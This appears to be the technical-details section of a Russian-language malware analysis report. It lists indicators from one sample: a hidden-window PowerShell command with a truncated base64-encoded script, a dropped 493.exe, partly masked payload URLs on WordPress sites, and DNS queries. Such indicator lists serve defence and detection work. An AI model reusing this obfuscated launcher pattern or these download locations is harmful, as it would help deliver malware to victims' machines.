Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGEAYgBwAHIAYwBqAGYAPQAnAEEAYQBvAGUAZwBzAHUAagBmAGoAJwA7ACQAVgBpAG0AcQBoAGEAdgB3ACAAPQAgACcANAA5ADMAJwA7ACQAUgBlAHIAYwBnAHkAeAB3AD0AJwBNAGQAagBpAGkAcAB0AGUAagB6AGIAYQB1ACcAOwA...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\493.exe
- http://sg####lower.edu.vn/wp-admin/includes/ZwzRro/
- http://www.st###otulli.com/wp-includes/k013-rhjzyfe-191613647/
- http://de####ra.ens.edu.br/wp-content/FTaPpNTX/
- DNS ASK ha###.rankhigh.ca
- DNS ASK sg####lower.edu.vn
- DNS ASK st###otulli.com
- DNS ASK de####ra.ens.edu.br
- DNS ASK ac#####amonster.com.br